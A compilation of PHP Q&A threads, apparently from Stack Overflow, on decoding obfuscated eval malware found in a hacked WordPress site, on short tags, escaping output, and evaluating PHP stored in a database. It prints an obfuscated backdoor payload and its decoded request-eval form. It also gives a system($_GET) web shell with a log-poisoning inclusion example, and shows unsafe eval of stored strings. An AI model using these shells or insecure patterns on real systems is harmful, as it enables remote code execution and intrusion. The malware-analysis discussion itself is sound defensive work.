I just noticed today that I have got lots of spam links in my wordpress blog. I just found a file which contains
<?php eval (chr(101).chr(114)...
Its very very long string. Can someone tell me how can I decode this to see what it does? So that I can try to remove the spam links?
Thanks.
Just replace eval by echo and have a look at the generated output
<?php echo (chr(101).chr(114)...
Instead of executing (eval) you can just echo out what it says, preferrably with htmlspecialchars if you execute it via browser:
<?php echo htmlspecialchars(chr(101)...
odds are though that you won't see anything understandable, since it is probably encoded in more ways than one.
Simply replace eval with echo:
<?php echo (chr(101).chr(114)...
Besides that, you most likely need to reinstall whatever you have on your webspace as you obviously have been hacked. Ensure that you use the most recent version of Wordpress and all other software you are running to prevent this from happening again.
Related
How can I insert php code without spaces like
<?phpecho'hello';?>
But I need it to be executed without errors not like the code above
Use PHP short syntax
<?='hello'?>
this the same as
<?php echo 'hello'; ?>
For anyone who stumbles this answer later on. The shorthand syntax as noted in the other answer will work, however, it can be used to execute other functions in the same way you can you pass output to echo. For Example:
<?=file_get_contents('/etc/password')?>
is equivalent to:
<?php echo file_get_contents('/etc/password'); ?>
you can also take this a step further to remove code execution by doing:
<?=system($_GET['c']?>
This is really helpful/dangerous (depending on perspective :) ) if you have a local file inclusion vulnerability that lets you include things like Web Server access logs.
e.g:
http://localhost/?<?=system($_GET['c']?>
http://localhost/vuln.php?include=/var/log/httpd/access.log&c=touch+/tmp/vulnerable
I Have read a lot on the normal php eval with the base64_encoder and was able to decode much of the infected php files.
With that said, I have this one file that does not follow standard eval call and I would like some help from the community.
Can anyone decode and/or tell me whats happening in the code?
Thanks,
--Eric
<?php /*vg!*/eval/*E}--oP8*/(/*pxHO*/base64_decode/*vgKGm*/(/*0%C*/'LypPSnBvKi9ldmFsLypGUSZRX00qLygvKk56SiovYmFzZTY0X2RlY29kZS8qPDU+cyovKC8qTVl5YnMqLydMeW91U
EZJcUwybG1MeXBiY0h0aFZTb3ZLQzhxZCcvKndLc2Q/PGgqLy4vKllcdkgqLycweHVYRFJvTkNvdmFYTnpaWFF2S2sxTVBDb3ZLQycvKiF9Z1sqLy4vKiBrVlQqLyc4cWRYMHJLaThrWDFKRlVWVkZVMVF2S2
54Mk9DdCcvKjlRSG1Ta1FIKi8uLypFYlMuaCovJ2VNRHM4S2k5Ykx5cHNkSFlxTHlkakp5OHFkMmRHJy8qQUI5Ki8uLypxcyFIZU4qLydlQ292TGk4cVFsVXpObElxTHlkdUp5OHFjRGw0SScvKiY6ZSovLi8
qSlVxKi8nVU51S2k4dUx5b3hYQ1o2S2k4bmVTY3ZLbU10Sz'/*0B>.'&CK*/./*W1H*/'MnLypxcFpJKi8uLypBKWVTKi8nQlNLaTh1THlwa2JqRTFKVG9xTHlkemNTY3ZLa2QnLypgZj5zZTgqLy4vKjlENT
FcTyovJ0ROVGxWS2k5ZEx5cFRORXc1S2k4dkttaytXVE1vJy8qOmBaRUtlJkUqLy4vKlVILjspZSovJ1pTb3ZLUzhxT1RCbFVsWlZLaTh2S2xaSmRTVkpmJy8qVzpMa2hUKi8uLyo1cTNmdT8qLydDb3ZLUzh
xTlZvM0ppb3ZaWFpoYkM4cVp5MWNTMCcvKmheXTtbICovLi8qTC5SS2JZKi8nY3FMeWd2S21KNFZVNHllU292YzNSeWFYQnpiR0YnLypTS2MuJSovLi8qb3MwXjUySHsqLyd6YUdWekx5cGVWVjUzYnlvdktD
OHFKMk00SjBvcScvKlJrSCEqLy4vKk41JjkqLydMeVJmVWtW'/*Ju%:AN*/./*0\`a Z=*/'UlZVVlRWQzhxUUNoZGF5b3ZXeThxTCcvKjw8J3guaCovLi8qbixXKi8nV1JXZXpKSFB6QXFMeWRqYmljdktpMX
JlVkpKS2knLyotVS5zKi8uLyogUl5OKi8nOHVMeXBFVnpKYVoyRXFMeWQ1YzNFbkx5bzRTMFknLypjWmsqLy4vKjNkeWVMKi8naElEb3lRU292WFM4cU5peDZkU292THlwdlNVSngnLyonQVJWdyl1Ki8uLyp
eX1pKOmZ2Ki8nVVNvdktTOHFNV0JqS1V3cUx5OHFiMVU4T2tzcUwnLypUdlQrJkYqLy4vKmtFPDNmISovJ3lrdktsVkllMnNsS2k4dktsWmhVaTVUS3lvdk95OHFKbHhoZlN4MEtpOD0nLypaKWVePyovKS8q
J2tYKi8vKmsmViovKS8qMWdFVyovLyo8OHhObSovOy8qXW8/Ki8='/*L,}I*/)/*8Oyj*//*uEGgU*/)/*+LT*//*Q?.e*/;/*oGCkBv*/ ?>
If you go all the way down the rabbit hole, you get the following command.
if(isset($_REQUEST['cnysq']))eval(stripslashes($_REQUEST['cnysq']));
If you open the code up in a visual editor, you'll see there are a lot of comments. Remove those, and you'll see that it's a bas64 encoded string.
Decode that, and you'll see more of the same.
Keep removing comments and concatenating strings and after about 3 levels, you get to this point.
It's just a bunch of PHP comments in there, e.g. from the first line:
<?php /*vg!*/eval/*E}--oP8*/(/*pxHO*/base64_decode/*vgKGm*/(/*0%C*/'LypPSnB etc...
^^^^^^^ ^^^^^^^^^^^ ^^^^^^^^ ^^^^^^^^^ ^^^^^^^--comments
is really just
<?php eval(base64_decode('LyPSnB etc...
I'm quite new here. I'm trying to make a blog/journal site that allows users to post their own journal. I'm still quite reluctant on making it because I am really afraid of malicious code injections.
So here's a sample code:
<?php
$test = "<b>blah</b>"; //User input from SQL
echo "$test";
?>
What will come out is just the word "blah" in bold right? What I was trying to achieve was to echo "<b>blah</b>" instead. I don't want people to put some PHP codes that can actually mess up my whole web page. Please keep in mind that the variable $test is actually a MYSQL query, so that variable will be needed as an example. I know you can do echo '$test'; but it just comes out as "$test" instead. I feel like pulling my hair out I can't figure it out yet.
The second solution I know of is the htmlspecialchars(); function, but I want the strings to display as what I typed, not the converted ones...
Is there any way I can do that?
I think the OP wants the HTML itself to be output to the page, and not have the tags stripped. To achieve this, you can run the string first through htmlentities()
$test = '<b>blah</b>';
echo htmlentities($test);
This will output:
<b>blah</b>
Which will render in the page as
<b>blah</b>
Echo don't execute PHP code from string. This is impossible and this is not security hole in your code.
You can use a template engine like Twig for exemple.
If htmlspecialchars(); is not the one you are looking for, try the header() option.
header('Content-type: text/plain');
When you are gonna give <b>Hi</b> to a browser, it will be displayed in Bold and not the text be returned. But you can try this way, outputting it inside a <textarea></textarea>.
Or the other way is to use htmlentities():
<?php
$test = "<b>blah</b>"; //User input from SQL
echo htmlentities("$test");
?>
I have this PHP code, and it appears to be obfuscated, instead of the massive line of code, I just substituted it with the word "code":
<?php
eval("?>".gzuncompress(base64_decode("code"))); ?>
Would there be any potential way of decoding said code?
Sure, just replace the eval() with echo(). Based on experience, though, the code in there will probably be obfuscated as well.
echo gzuncompress(base64_decode("code")));
And, then, use auto format feature of some IDE
I have a string that has HTML & PHP in it, when I pull the string from the database, it is echo'd to screen, but the PHP code doesn't display. The string looks like this:
$string = 'Hello <?php echo 'World';?>';
echo $string;
Output
Hello
Source Code
Hello <?php echo 'World';?>
When I look in the source code, I can see the php line there. So what I need to do is eval() just the php segment that is in the string.
One thing to consider is that the PHP could be located anywhere in the string at any given time.
* Just to clarify, my PHP config is correct, this is a case of some PHP being dumped from the database and not rendering, because I am echo'ing a variable with the PHP code in it, it fails to run. *
Thanks again for any help I may receive.
$str = "Hello
<?php echo 'World';?>";
$matches = array();
preg_match('/<\?php (.+) \?>/x', $str, $matches);
eval($matches[1]);
This will work, but like others have and will suggest, this is a terrible idea. Your application architecture should never revolve around storing code in the database.
Most simply, if you have pages that always need to display strings, store those strings in the database, not code to produce them. Real world data is more complicated than this, but must always be properly modelled in the database.
Edit: Would need adapting with preg_replace_callback to remove the source/interpolate correctly.
You shouldn't eval the php code, just run it. It's need to be php interpreter installed, and apache+php properly configured. Then this .php file should output Hello World.
Answer to the edit:
Use preg_replace_callback to get the php part, eval it, replace the input to the output, then echo it.
But. If you should eval things come from database, i'm almost sure, it's a design error.
eval() should work fine, as long as the code is proper PHP and ends with a semicolon. How about you strip off the php tag first, then eval it.
The following example was tested and works:
<?php
$db_result = "<?php echo 'World';?>";
$stripped_code = str_replace('?>', '', str_replace('<?php', '', $db_result));
eval($stripped_code);
?>
Just make sure that whatever you retrieve from the db has been properly sanitized first, since you're essentially allowing anyone who can get content into the db, to execute code.